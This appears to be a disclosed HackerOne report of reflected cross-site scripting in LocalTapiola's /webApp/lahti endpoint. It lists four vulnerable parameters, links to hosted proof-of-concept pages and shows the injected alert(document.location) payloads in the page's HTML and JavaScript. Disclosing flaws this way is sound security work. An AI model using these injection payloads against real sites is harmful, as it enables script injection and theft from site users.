LocalTapiola: Multiple Reflected XSS /webApp/lahti (viestinta.lahitapiola.fi)

2016-11-12T21:48:17
ID H1:181842
Type hackerone
Reporter bobrov
Modified 2017-02-03T16:05:25

Description

Vulnerable script: /webApp/lahti Vulnerable parameters: ctx[vars][html], ctx[vars][zoom], ctx[vars][Lat], ctx[vars][Lng]

PoC #1 html parameter https://blackfan.ru/localtapiola_4567uytr567tre4567ytr/poc1_html.html Result: html <td id="html-html196-cell" class="html" style="" colspan="1"><script>alert(document.location)</script></td>

PoC #2 zoom parameter https://blackfan.ru/localtapiola_4567uytr567tre4567ytr/poc2_zoom.html Result: js function initialize() { var myLatlng = new google.maps.LatLng(60.9949226,25.6508941); var mapOptions = { zoom: alert(document.loction),

PoC #3 Lat parameter https://blackfan.ru/localtapiola_4567uytr567tre4567ytr/poc3_Lat.html Result: js function initialize() { var myLatlng = new google.maps.LatLng(alert(document.location),25.6508941);

PoC #4 Lng parameter https://blackfan.ru/localtapiola_4567uytr567tre4567ytr/poc4_Lng.html Result: js function initialize() { var myLatlng = new google.maps.LatLng(60.9949226,alert(document.location));